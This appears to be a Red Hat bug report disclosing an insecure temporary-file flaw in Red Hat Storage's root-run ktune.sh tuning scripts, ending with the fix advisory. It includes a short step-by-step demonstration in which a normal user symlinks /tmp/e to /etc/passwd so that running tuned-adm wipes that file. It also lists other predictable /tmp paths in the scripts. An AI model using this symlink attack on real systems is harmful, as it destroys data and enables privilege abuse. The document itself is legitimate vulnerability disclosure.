Gowrishankar Rajaiyan (grajaiya) reports: I found a potential security issue with redhat-storage-server-1.7.3-2.el6rhs.noarch previously known as appliance-base-1.7.3-1.el6rhs while verifying https://bugzilla.redhat.com/show_bug.cgi?id=910566. [Open URL] This issue also exists in the latest released version of RHS https://rhn.redhat.com/rhn/software/channel/downloads/Download.do?cid=14689 [Open URL] Description: As part of /etc/tune-profiles/rhs-high-throughput/ktune.sh and /etc/tune-profiles/rhs-virtualization/ktune.sh <snip> for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do </snip> A file "e" is created in /tmp directory. This information is public at https://bugzilla.redhat.com/show_bug.cgi?id=910566#c13 [Open URL] (I set it to private now, not sure if that helps). So any normal user can create a softlink from /tmp/e to /etc/passwd. The tuned profiles are executed as root user, hence, exposes a security loop hole where in a normal user can wipe out /etc/passwd. Please guide on how to proceed from here. A demonstration is as follows: As normal user: [shanks@localhost ~]$ id uid=500(shanks) gid=500(shanks) groups=500(shanks) [shanks@localhost ~]$ cd /tmp/ [shanks@localhost tmp]$ ln -s /etc/passwd e [shanks@localhost tmp]$ ls -l total 4 lrwxrwxrwx 1 shanks shanks 11 Jul 19 12:49 e -> /etc/passwd -rwx------. 1 root root 391 Jul 19 09:04 ks-script-QuMjt3 -rwxr-xr-x. 1 root root 0 Jul 19 09:04 ks-script-QuMjt3.log -rw------- 1 root root 0 Jul 19 09:04 tmp.ta4401DZd7 -rw-------. 1 root root 0 Jul 19 08:54 yum.log [shanks@localhost tmp]$ As root: [root@localhost ~]# tuned-adm profile rhs-high-throughput Reverting to saved sysctl settings: [ OK ] Calling '/etc/ktune.d/tunedadm.sh stop': setting readahead to 128 on brick devices: [ OK ] Reverting to cfq elevator: dm-0 dm-1 [ OK ] Stopping tuned: [ OK ] Switching to profile 'rhs-high-throughput' Applying ktune sysctl settings: /etc/ktune.d/tunedadm.conf: [ OK ] Calling '/etc/ktune.d/tunedadm.sh start': setting readahead to 65536 on brick devices: [ OK ] Applying sysctl settings from /etc/sysctl.conf Applying deadline elevator: dm-0 dm-1 [ OK ] Starting tuned: 'import site' failed; use -v for traceback [ OK ] [root@localhost ~]# cat /etc/passwd [root@localhost ~]#
Also there appear to be more vulnerabilities: /etc/tune-profiles/rhs-virtualization/ktune.sh: bricklist='/tmp/local-bricks.list' /etc/tune-profiles/rhs-virtualization/ktune.sh: for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do /etc/tune-profiles/rhs-virtualization/ktune.sh: done) 2>> /tmp/bricks.err /etc/tune-profiles/rhs-virtualization/ktune.sh: echo '* hard nofile 16384' ) > /tmp/limits.conf /etc/tune-profiles/rhs-virtualization/ktune.sh: mv /tmp/limits.conf $limits_conf /etc/tune-profiles/rhs-virtualization/ktune.sh: grep -v 'soft nofile' $limits_conf | grep -v 'hard nofile' > /tmp/limits.conf /etc/tune-profiles/rhs-virtualization/ktune.sh: mv /tmp/limits.conf $limits_conf /etc/tune-profiles/rhs-high-throughput/ktune.sh: bricklist='/tmp/local-bricks.list' /etc/tune-profiles/rhs-high-throughput/ktune.sh: for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do /etc/tune-profiles/rhs-high-throughput/ktune.sh: done) 2>> /tmp/bricks.err
Acknowledgements: These issues were discovered by Gowrishankar Rajaiyan of Red Hat and Kurt Seifried of the Red Hat Security Response Team.
This issue has been addressed in following products: Red Hat Storage 2.0 Via RHSA-2013:1205 https://rhn.redhat.com/errata/RHSA-2013-1205.html